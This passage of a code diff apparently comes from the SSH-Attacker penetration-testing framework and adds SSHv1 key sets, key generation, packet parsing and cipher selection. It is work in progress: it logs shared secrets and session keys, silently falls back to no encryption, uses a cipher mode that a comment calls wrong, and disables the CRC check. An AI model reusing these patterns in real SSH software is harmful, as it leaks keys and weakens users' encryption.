computations.setPlainPacketBytes(plainData); + ModifiableByteArray plain_modifialbel = new ModifiableByteArray(); + plain_modifialbel.setOriginalValue(plainData); + packet.setPayload(plain_modifialbel); + } else if (packet instanceof BinaryPacketSSHv1) { + PacketCryptoComputations computations = ((BinaryPacketSSHv1) packet).getComputations(); + if (computations.isPlainPacketBytesFirstBlockOnly()) { + byte[] firstBlock = computations.getPlainPacketBytes().getOriginalValue(); + byte[] ciphertext = packet.getCiphertext().getValue(); + byte[] remainingBlocks; + if (encryptionAlgorithm.getIVSize() > 0) { + // Case 1a: Binary packet / First block decrypted / Cipher with IV + computations.setIv(nextIv); + byte[] remainingBlocksIv = + extractNextIv( + nextIv, + Arrays.copyOfRange( + packet.getCiphertext().getValue(), + 0, + firstBlock.length)); + remainingBlocks = + cipher.decrypt( + Arrays.copyOfRange( + ciphertext, firstBlock.length, ciphertext.length), + remainingBlocksIv); + } else { + // Case 1b: Binary packet / First block decrypted / Cipher without IV + remainingBlocks = + cipher.decrypt( + Arrays.copyOfRange( + ciphertext, firstBlock.length, ciphertext.length)); + } + plainData = ArrayConverter.concatenate(firstBlock, remainingBlocks); + } else { + if (encryptionAlgorithm.getIVSize() > 0) { + // Case 2a: Binary packet / First block not decrypted / Cipher with IV + computations.setIv(nextIv); + plainData = + cipher.decrypt( + packet.getCiphertext().getValue(), + computations.getIv().getValue()); + } else { + // Case 2b: Binary packet / First block not decrypted / Cipher without IV + plainData = cipher.decrypt(packet.getCiphertext().getValue()); + } + } + computations.setPlainPacketBytes(plainData); + ModifiableByteArray plain_modifialbel = new ModifiableByteArray(); + plain_modifialbel.setOriginalValue(plainData); + packet.setPayload(plain_modifialbel); + } else { + if (encryptionAlgorithm.getIVSize() > 0) { + // Case 3a: Blob packet / Cipher with IV + plainData = cipher.decrypt(packet.getCiphertext().getValue(), nextIv); + } else { + // Case 3b: Blob packet / Cipher without IV + plainData = cipher.decrypt(packet.getCiphertext().getValue()); + } + packet.setCompressedPayload(plainData); + ModifiableByteArray plain_modifialbel = new ModifiableByteArray(); + plain_modifialbel.setOriginalValue(plainData); + packet.setPayload(plain_modifialbel); + } + // Set the IV for the next packet if the encryption algorithm incorporates one + if (encryptionAlgorithm.getIVSize() > 0) { + nextIv = extractNextIv(nextIv, packet.getCiphertext().getValue()); + } + } + + private byte[] extractNextIv(byte[] iv, byte[] ct) { + switch (encryptionAlgorithm.getMode()) { + case CBC: + // Next IV in CBC mode is the last block of the current ciphertext + return Arrays.copyOfRange( + ct, ct.length - encryptionAlgorithm.getBlockSize(), ct.length); + case CTR: + // Next IV in CTR mode is the old counter / iv incremented by the number of blocks + // of the ciphertext + BigInteger ctr = new BigInteger(1, iv); + int ctBlocks = ct.length / encryptionAlgorithm.getBlockSize(); + ctr = ctr.add(BigInteger.valueOf(ctBlocks)); + // Wrap around if the counter would exceed the length of the iv + // This is rather unlikely to occur even once, but this is the OpenSSL behavior when + // overflowing + ctr = + ctr.mod( + BigInteger.ONE.shiftLeft( + Byte.SIZE * encryptionAlgorithm.getIVSize())); + return ArrayConverter.bigIntegerToNullPaddedByteArray( + ctr, encryptionAlgorithm.getIVSize()); + default: + throw new UnsupportedOperationException( + "Unable to extract initialization vector for mode: " + + encryptionAlgorithm.getMode()); + } + } + + public byte[] getNextIv() { + return nextIv; + } + + public void setNextIv(byte[] nextIv) { + this.nextIv = nextIv; + } + + public AbstractCipher getCipher() { + return cipher; + } + + @Override + public String toString() { + return getClass().getSimpleName() + + "[Cipher: " + + encryptionAlgorithm + + ", MAC: " + + macAlgorithm + + "]"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySet.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/AbstractKeySet.java similarity index 98% rename from SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySet.java rename to SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/AbstractKeySet.java index 959fc166f..b2f2fd0df 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySet.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/AbstractKeySet.java @@ -16,7 +16,7 @@ @XmlRootElement @XmlAccessorType(XmlAccessType.FIELD) -public class KeySet { +public abstract class AbstractKeySet { private byte[] clientWriteInitialIv; private byte[] serverWriteInitialIv; @@ -25,7 +25,7 @@ public class KeySet { private byte[] clientWriteIntegrityKey; private byte[] serverWriteIntegrityKey; - public KeySet() {} + public AbstractKeySet() {} public byte[] getClientWriteInitialIv() { return clientWriteInitialIv; @@ -148,7 +148,7 @@ public String toString() { public boolean equals(Object o) { if (this == o) return true; if (o == null || getClass() != o.getClass()) return false; - KeySet keySet = (KeySet) o; + AbstractKeySet keySet = (AbstractKeySet) o; return Arrays.equals(clientWriteInitialIv, keySet.clientWriteInitialIv) && Arrays.equals(serverWriteInitialIv, keySet.serverWriteInitialIv) && Arrays.equals(clientWriteEncryptionKey, keySet.clientWriteEncryptionKey) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java index acf0cccb3..41439c2e3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/KeySetGenerator.java @@ -7,11 +7,15 @@ */ package de.rub.nds.sshattacker.core.packet.cipher.keys; +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithm; import de.rub.nds.sshattacker.core.constants.KeyDerivationLabels; import de.rub.nds.sshattacker.core.crypto.KeyDerivation; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.util.Converter; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import java.util.Arrays; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -21,66 +25,121 @@ public final class KeySetGenerator { private KeySetGenerator() {} - public static KeySet generateKeySet(SshContext context) { - KeySet keySet = new KeySet(); - Chooser chooser = context.getChooser(); - String hashAlgorithm = chooser.getKeyExchangeAlgorithm().getDigest(); - byte[] sharedSecret = - Converter.bytesToLengthPrefixedBinaryString( - context.getSharedSecret().orElse(new byte[] {0})); - byte[] exchangeHash = context.getExchangeHash().orElse(new byte[0]); - byte[] sessionId = context.getSessionID().orElse(new byte[0]); - - keySet.setClientWriteInitialIv( - KeyDerivation.deriveKey( - sharedSecret, - exchangeHash, - KeyDerivationLabels.INITIAL_IV_CLIENT_TO_SERVER, - sessionId, - chooser.getEncryptionAlgorithmClientToServer().getIVSize(), - hashAlgorithm)); - keySet.setServerWriteInitialIv( - KeyDerivation.deriveKey( - sharedSecret, - exchangeHash, - KeyDerivationLabels.INITIAL_IV_SERVER_TO_CLIENT, - sessionId, - chooser.getEncryptionAlgorithmServerToClient().getIVSize(), - hashAlgorithm)); - keySet.setClientWriteEncryptionKey( - KeyDerivation.deriveKey( - sharedSecret, - exchangeHash, - KeyDerivationLabels.ENCRYPTION_KEY_CLIENT_TO_SERVER, - sessionId, - chooser.getEncryptionAlgorithmClientToServer().getKeySize(), - hashAlgorithm)); - keySet.setServerWriteEncryptionKey( - KeyDerivation.deriveKey( - sharedSecret, - exchangeHash, - KeyDerivationLabels.ENCRYPTION_KEY_SERVER_TO_CLIENT, - sessionId, - chooser.getEncryptionAlgorithmServerToClient().getKeySize(), - hashAlgorithm)); - keySet.setClientWriteIntegrityKey( - KeyDerivation.deriveKey( - sharedSecret, - exchangeHash, - KeyDerivationLabels.INTEGRITY_KEY_CLIENT_TO_SERVER, - sessionId, - chooser.getMacAlgorithmClientToServer().getKeySize(), - hashAlgorithm)); - keySet.setServerWriteIntegrityKey( - KeyDerivation.deriveKey( - sharedSecret, - exchangeHash, - KeyDerivationLabels.INTEGRITY_KEY_SERVER_TO_CLIENT, - sessionId, - chooser.getMacAlgorithmServerToClient().getKeySize(), - hashAlgorithm)); - - LOGGER.info(keySet); + public static AbstractKeySet generateKeySet(SshContext context) { + AbstractKeySet keySet; + if (context.getContext() + .getLayerStack() + .getHighestLayer() + .getLayerType() + .equals(ImplementedLayers.SSHV2)) { + keySet = new SSHv2KeySet(); + Chooser chooser = context.getChooser(); + String hashAlgorithm = chooser.getKeyExchangeAlgorithm().getDigest(); + byte[] sharedSecret = + Converter.bytesToLengthPrefixedBinaryString( + context.getSharedSecret().orElse(new byte[] {0})); + byte[] exchangeHash = context.getExchangeHash().orElse(new byte[0]); + byte[] sessionId = context.getSessionID().orElse(new byte[0]); + + keySet.setClientWriteInitialIv( + KeyDerivation.deriveKey( + sharedSecret, + exchangeHash, + KeyDerivationLabels.INITIAL_IV_CLIENT_TO_SERVER, + sessionId, + chooser.getEncryptionAlgorithmClientToServer().getIVSize(), + hashAlgorithm)); + keySet.setServerWriteInitialIv( + KeyDerivation.deriveKey( + sharedSecret, + exchangeHash, + KeyDerivationLabels.INITIAL_IV_SERVER_TO_CLIENT, + sessionId, + chooser.getEncryptionAlgorithmServerToClient().getIVSize(), + hashAlgorithm)); + keySet.setClientWriteEncryptionKey( + KeyDerivation.deriveKey( + sharedSecret, + exchangeHash, + KeyDerivationLabels.ENCRYPTION_KEY_CLIENT_TO_SERVER, + sessionId, + chooser.getEncryptionAlgorithmClientToServer().getKeySize(), + hashAlgorithm)); + keySet.setServerWriteEncryptionKey( + KeyDerivation.deriveKey( + sharedSecret, + exchangeHash, + KeyDerivationLabels.ENCRYPTION_KEY_SERVER_TO_CLIENT, + sessionId, + chooser.getEncryptionAlgorithmServerToClient().getKeySize(), + hashAlgorithm)); + keySet.setClientWriteIntegrityKey( + KeyDerivation.deriveKey( + sharedSecret, + exchangeHash, + KeyDerivationLabels.INTEGRITY_KEY_CLIENT_TO_SERVER, + sessionId, + chooser.getMacAlgorithmClientToServer().getKeySize(), + hashAlgorithm)); + keySet.setServerWriteIntegrityKey( + KeyDerivation.deriveKey( + sharedSecret, + exchangeHash, + KeyDerivationLabels.INTEGRITY_KEY_SERVER_TO_CLIENT, + sessionId, + chooser.getMacAlgorithmServerToClient().getKeySize(), + hashAlgorithm)); + + LOGGER.info(keySet); + } else if (context.getContext() + .getLayerStack() + .getHighestLayer() + .getLayerType() + .equals(ImplementedLayers.SSHV1)) { + keySet = new SSHv1KeySet(); + byte[] sharedSecret = context.getSharedSecret().orElse(new byte[] {0}); + + if (context.getEncryptionAlgorithmClientToServer().isPresent() + && context.getEncryptionAlgorithmServerToClient().isPresent()) { + EncryptionAlgorithm c2s, s2c; + + c2s = context.getEncryptionAlgorithmClientToServer().get(); + s2c = context.getEncryptionAlgorithmServerToClient().get(); + + byte[] server_key; + byte[] client_key; + + if (c2s == EncryptionAlgorithm.TRIPLE_DES_CBC + && s2c == EncryptionAlgorithm.TRIPLE_DES_CBC) { + server_key = Arrays.copyOfRange(sharedSecret, 0, 24); + client_key = Arrays.copyOfRange(sharedSecret, 0, 24); + + LOGGER.debug( + "SHARED SECRET is {}", ArrayConverter.bytesToHexString(server_key)); + + } else { + server_key = sharedSecret; + client_key = sharedSecret; + } + + keySet.setServerWriteEncryptionKey(server_key); + keySet.setClientWriteEncryptionKey(client_key); + keySet.setClientWriteInitialIv(new byte[c2s.getIVSize()]); + keySet.setServerWriteInitialIv(new byte[s2c.getIVSize()]); + LOGGER.debug("Generated SSHv1 Keyset sucessfully"); + } + + } else { + LOGGER.warn( + "Highest Layer {} not supported for Key Generation", + context.getContext() + .getLayerStack() + .getHighestLayer() + .getLayerType() + .getName()); + return null; + } + return keySet; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/SSHv1KeySet.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/SSHv1KeySet.java new file mode 100644 index 000000000..25769c131 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/SSHv1KeySet.java @@ -0,0 +1,126 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.packet.cipher.keys; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.tlsattacker.transport.ConnectionEndType; +import jakarta.xml.bind.annotation.XmlAccessType; +import jakarta.xml.bind.annotation.XmlAccessorType; +import jakarta.xml.bind.annotation.XmlRootElement; +import java.util.Arrays; + +@XmlRootElement +@XmlAccessorType(XmlAccessType.FIELD) +public class SSHv1KeySet extends AbstractKeySet { + + private byte[] clientWriteInitialIv; + private byte[] serverWriteInitialIv; + private byte[] clientWriteEncryptionKey; + private byte[] serverWriteEncryptionKey; + + public SSHv1KeySet() {} + + public byte[] getClientWriteInitialIv() { + return clientWriteInitialIv; + } + + public void setClientWriteInitialIv(byte[] clientWriteInitialIv) { + this.clientWriteInitialIv = clientWriteInitialIv; + } + + public byte[] getServerWriteInitialIv() { + return serverWriteInitialIv; + } + + public void setServerWriteInitialIv(byte[] serverWriteInitialIv) { + this.serverWriteInitialIv = serverWriteInitialIv; + } + + public byte[] getClientWriteEncryptionKey() { + return clientWriteEncryptionKey; + } + + public void setClientWriteEncryptionKey(byte[] clientWriteEncryptionKey) { + this.clientWriteEncryptionKey = clientWriteEncryptionKey; + } + + public byte[] getServerWriteEncryptionKey() { + return serverWriteEncryptionKey; + } + + public void setServerWriteEncryptionKey(byte[] serverWriteEncryptionKey) { + this.serverWriteEncryptionKey = serverWriteEncryptionKey; + } + + public byte[] getWriteIv(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return clientWriteInitialIv; + } else { + return serverWriteInitialIv; + } + } + + public byte[] getReadIv(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return serverWriteInitialIv; + } else { + return clientWriteInitialIv; + } + } + + public byte[] getWriteEncryptionKey(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return clientWriteEncryptionKey; + } else { + return serverWriteEncryptionKey; + } + } + + public byte[] getReadEncryptionKey(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return serverWriteEncryptionKey; + } else { + return clientWriteEncryptionKey; + } + } + + @Override + public String toString() { + return "Initial IV (client to server): " + + ArrayConverter.bytesToRawHexString(clientWriteInitialIv) + + "\n" + + "Initial IV (server to client): " + + ArrayConverter.bytesToRawHexString(serverWriteInitialIv) + + "\n" + + "Encryption key (client to server): " + + ArrayConverter.bytesToRawHexString(clientWriteEncryptionKey) + + "\n" + + "Encryption key (server to client): " + + ArrayConverter.bytesToRawHexString(serverWriteEncryptionKey); + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + SSHv1KeySet keySet = (SSHv1KeySet) o; + return Arrays.equals(clientWriteInitialIv, keySet.clientWriteInitialIv) + && Arrays.equals(serverWriteInitialIv, keySet.serverWriteInitialIv) + && Arrays.equals(clientWriteEncryptionKey, keySet.clientWriteEncryptionKey) + && Arrays.equals(serverWriteEncryptionKey, keySet.serverWriteEncryptionKey); + } + + @Override + public int hashCode() { + int result = Arrays.hashCode(clientWriteInitialIv); + result = 31 * result + Arrays.hashCode(serverWriteInitialIv); + result = 31 * result + Arrays.hashCode(clientWriteEncryptionKey); + result = 31 * result + Arrays.hashCode(serverWriteEncryptionKey); + return result; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/SSHv2KeySet.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/SSHv2KeySet.java new file mode 100644 index 000000000..9e351682b --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/SSHv2KeySet.java @@ -0,0 +1,170 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.packet.cipher.keys; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.tlsattacker.transport.ConnectionEndType; +import jakarta.xml.bind.annotation.XmlAccessType; +import jakarta.xml.bind.annotation.XmlAccessorType; +import jakarta.xml.bind.annotation.XmlRootElement; +import java.util.Arrays; + +@XmlRootElement +@XmlAccessorType(XmlAccessType.FIELD) +public class SSHv2KeySet extends AbstractKeySet { + + private byte[] clientWriteInitialIv; + private byte[] serverWriteInitialIv; + private byte[] clientWriteEncryptionKey; + private byte[] serverWriteEncryptionKey; + private byte[] clientWriteIntegrityKey; + private byte[] serverWriteIntegrityKey; + + public SSHv2KeySet() {} + + public byte[] getClientWriteInitialIv() { + return clientWriteInitialIv; + } + + public void setClientWriteInitialIv(byte[] clientWriteInitialIv) { + this.clientWriteInitialIv = clientWriteInitialIv; + } + + public byte[] getServerWriteInitialIv() { + return serverWriteInitialIv; + } + + public void setServerWriteInitialIv(byte[] serverWriteInitialIv) { + this.serverWriteInitialIv = serverWriteInitialIv; + } + + public byte[] getClientWriteEncryptionKey() { + return clientWriteEncryptionKey; + } + + public void setClientWriteEncryptionKey(byte[] clientWriteEncryptionKey) { + this.clientWriteEncryptionKey = clientWriteEncryptionKey; + } + + public byte[] getServerWriteEncryptionKey() { + return serverWriteEncryptionKey; + } + + public void setServerWriteEncryptionKey(byte[] serverWriteEncryptionKey) { + this.serverWriteEncryptionKey = serverWriteEncryptionKey; + } + + public byte[] getClientWriteIntegrityKey() { + return clientWriteIntegrityKey; + } + + public void setClientWriteIntegrityKey(byte[] clientWriteIntegrityKey) { + this.clientWriteIntegrityKey = clientWriteIntegrityKey; + } + + public byte[] getServerWriteIntegrityKey() { + return serverWriteIntegrityKey; + } + + public void setServerWriteIntegrityKey(byte[] serverWriteIntegrityKey) { + this.serverWriteIntegrityKey = serverWriteIntegrityKey; + } + + public byte[] getWriteIv(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return clientWriteInitialIv; + } else { + return serverWriteInitialIv; + } + } + + public byte[] getReadIv(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return serverWriteInitialIv; + } else { + return clientWriteInitialIv; + } + } + + public byte[] getWriteEncryptionKey(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return clientWriteEncryptionKey; + } else { + return serverWriteEncryptionKey; + } + } + + public byte[] getReadEncryptionKey(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return serverWriteEncryptionKey; + } else { + return clientWriteEncryptionKey; + } + } + + public byte[] getWriteIntegrityKey(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return clientWriteIntegrityKey; + } else { + return serverWriteIntegrityKey; + } + } + + public byte[] getReadIntegrityKey(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return serverWriteIntegrityKey; + } else { + return clientWriteIntegrityKey; + } + } + + @Override + public String toString() { + return "Initial IV (client to server): " + + ArrayConverter.bytesToRawHexString(clientWriteInitialIv) + + "\n" + + "Initial IV (server to client): " + + ArrayConverter.bytesToRawHexString(serverWriteInitialIv) + + "\n" + + "Encryption key (client to server): " + + ArrayConverter.bytesToRawHexString(clientWriteEncryptionKey) + + "\n" + + "Encryption key (server to client): " + + ArrayConverter.bytesToRawHexString(serverWriteEncryptionKey) + + "\n" + + "Integrity key (client to server): " + + ArrayConverter.bytesToRawHexString(clientWriteIntegrityKey) + + "\n" + + "Integrity key (server to client): " + + ArrayConverter.bytesToRawHexString(serverWriteIntegrityKey); + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + SSHv2KeySet keySet = (SSHv2KeySet) o; + return Arrays.equals(clientWriteInitialIv, keySet.clientWriteInitialIv) + && Arrays.equals(serverWriteInitialIv, keySet.serverWriteInitialIv) + && Arrays.equals(clientWriteEncryptionKey, keySet.clientWriteEncryptionKey) + && Arrays.equals(serverWriteEncryptionKey, keySet.serverWriteEncryptionKey) + && Arrays.equals(clientWriteIntegrityKey, keySet.clientWriteIntegrityKey) + && Arrays.equals(serverWriteIntegrityKey, keySet.serverWriteIntegrityKey); + } + + @Override + public int hashCode() { + int result = Arrays.hashCode(clientWriteInitialIv); + result = 31 * result + Arrays.hashCode(serverWriteInitialIv); + result = 31 * result + Arrays.hashCode(clientWriteEncryptionKey); + result = 31 * result + Arrays.hashCode(serverWriteEncryptionKey); + result = 31 * result + Arrays.hashCode(clientWriteIntegrityKey); + result = 31 * result + Arrays.hashCode(serverWriteIntegrityKey); + return result; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java index 66e565f23..f6dca6d21 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java @@ -64,6 +64,9 @@ public void parse(BinaryPacketSSHv1 binaryPacket) { } else if (activeDecryptCipher.isEncryptThenMac()) { LOGGER.debug("Packet structure: Encrypt-then-MAC"); parseETMPacket(binaryPacket); + } else if (activeDecryptCipher.getMacAlgorithm() == null + && activeDecryptCipher.getEncryptionAlgorithm() != EncryptionAlgorithm.NONE) { + parseSSHv1Packet(binaryPacket); } else { LOGGER.debug("Packet structure: Encrypt-and-MAC"); parseEAMPacket(binaryPacket); @@ -211,4 +214,15 @@ private void parseEAMPacket(BinaryPacketSSHv1 binaryPacket) throws CryptoExcepti parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize()));*/ LOGGER.debug("DONE WITH PARSING parseEAMPacket "); } + + private void parseSSHv1Packet(BinaryPacketSSHv1 binaryPacket) throws CryptoException { + LOGGER.debug("PARSING SSHv1Packet"); + binaryPacket.setLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); + LOGGER.debug("LENGHT = {}", binaryPacket.getLength()); + + int padding_lenght = 8 - (binaryPacket.getLength().getValue() % 8); + + binaryPacket.setCiphertext( + parseByteArrayField(binaryPacket.getLength().getValue() + padding_lenght)); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java index db5f13a09..7509b670e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java @@ -56,7 +56,7 @@ protected byte[] serializeBytes() { "MAC / Authentication tag: {}", ArrayConverter.bytesToHexString(binaryPacket.getMac().getValue()));*/ - appendBytes(binaryPacket.getCrcChecksum().getValue()); + // appendBytes(binaryPacket.getCrcChecksum().getValue()); binaryPacket.setCompletePacketBytes(getAlreadySerialized()); LOGGER.debug( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java index 6b208f0a2..7bed1ceee 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -7,20 +7,35 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.handler; +import static de.rub.nds.sshattacker.core.constants.CipherMethod.*; + import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.CipherMethod; +import de.rub.nds.sshattacker.core.constants.CipherMode; +import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithm; +import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithmType; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; +import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; +import de.rub.nds.sshattacker.core.packet.cipher.keys.AbstractKeySet; +import de.rub.nds.sshattacker.core.protocol.common.MessageSentHandler; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; +import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import java.util.Arrays; +import java.util.Objects; +import java.util.Optional; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ClientSessionKeyMessageHandler extends SshMessageHandler { +public class ClientSessionKeyMessageHandler extends SshMessageHandler + implements MessageSentHandler { private static final Logger LOGGER = LogManager.getLogger(); @@ -32,6 +47,48 @@ public ClientSessionKeyMessageHandler(SshContext context) { public void adjustContext(ClientSessionKeyMessage message) { sshContext.setChosenCipherMethod(message.getChosenCipherMethod()); sshContext.setChosenProtocolFlags(message.getChosenProtocolFlags()); + Chooser chooser = sshContext.getChooser(); + + EncryptionAlgorithm encryptionAlgorithm; + + CipherMethod chosenCipherMethod = sshContext.getChosenCipherMethod(); + + switch (chosenCipherMethod) { + case SSH_CIPHER_3DES: + encryptionAlgorithm = EncryptionAlgorithm.TRIPLE_DES_CBC; + break; + case SSH_CIPHER_NONE: + encryptionAlgorithm = EncryptionAlgorithm.NONE; + break; + case SSH_CIPHER_IDEA: + encryptionAlgorithm = EncryptionAlgorithm.IDEA_CTR; // Wrong, needts to be IDEA_CFB! + break; + case SSH_CIPHER_DES: + encryptionAlgorithm = EncryptionAlgorithm.DES_CBC; + break; + case SSH_CIPHER_ARCFOUR: + encryptionAlgorithm = EncryptionAlgorithm.ARCFOUR; + break; + case SSH_CIPHER_BLOWFISH: + encryptionAlgorithm = EncryptionAlgorithm.BLOWFISH_CBC; + break; + default: + encryptionAlgorithm = EncryptionAlgorithm.NONE; + // Fallback to None if nothing applied, throw Warning. + LOGGER.warn( + "chosen unsupported Encryption-Algorithm {}, fall back to NONE", + chosenCipherMethod); + } + LOGGER.info("Successfulle applied Encryption Algorihm {}", encryptionAlgorithm); + + // Set Server2Client and Client2Server identical because of SSH1 + chooser.getContext() + .getSshContext() + .setEncryptionAlgorithmClientToServer(encryptionAlgorithm); + + chooser.getContext() + .getSshContext() + .setEncryptionAlgorithmServerToClient(encryptionAlgorithm); byte[] decryptedSessionkey; try { @@ -41,6 +98,61 @@ public void adjustContext(ClientSessionKeyMessage message) { } sshContext.setSessionKey(decryptedSessionkey); + sshContext.setSharedSecret(decryptedSessionkey); + KeyExchangeUtil.generateKeySet(sshContext); + + Optional keySet = sshContext.getKeySet(); + + // We Recive here, because we are in the handler + encryptionAlgorithm = chooser.getReceiveEncryptionAlgorithm(); + AbstractKeySet activeKeySet = sshContext.getPacketLayer().getDecryptorCipher().getKeySet(); + EncryptionAlgorithm activeEncryptionAlgorithm = + sshContext.getPacketLayer().getDecryptorCipher().getEncryptionAlgorithm(); + + if (!sshContext.getConfig().getForcePacketCipherChange() + && Objects.equals(activeKeySet, keySet.get()) + && encryptionAlgorithm == activeEncryptionAlgorithm + && (encryptionAlgorithm.getType() == EncryptionAlgorithmType.AEAD)) { + LOGGER.info( + "Key set and algorithms unchanged, not changing active decryption cipher - workflow will continue with old cipher"); + return; + } + + try { + PacketCipher packetCipher = + PacketCipherFactory.getPacketCipher( + sshContext, + keySet.get(), + encryptionAlgorithm, + null, + CipherMode.DECRYPT); + sshContext.getPacketLayer().updateDecryptionCipher(packetCipher); + + } catch (IllegalArgumentException e) { + LOGGER.warn( + "Caught an exception while trying to update the active {} cipher after handling a new keys message - workflow will continue with old cipher", + "decryption"); + LOGGER.debug(e); + } + + try { + PacketCipher packetCipher = + PacketCipherFactory.getPacketCipher( + sshContext, + keySet.get(), + encryptionAlgorithm, + null, + CipherMode.ENCRYPT); + sshContext.getPacketLayer().updateEncryptionCipher(packetCipher); + + } catch (IllegalArgumentException e) { + LOGGER.warn( + "Caught an exception while trying to update the active {} cipher after handling a new keys message - workflow will continue with old cipher", + "encryption"); + LOGGER.debug(e); + } + + LOGGER.info("Set Keys and Algorithms after sending the message"); } private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoException { @@ -117,4 +229,71 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); return sessionKey; } + + @Override + public void adjustContextAfterMessageSent() { + // We Send here, because we are in the perperator + 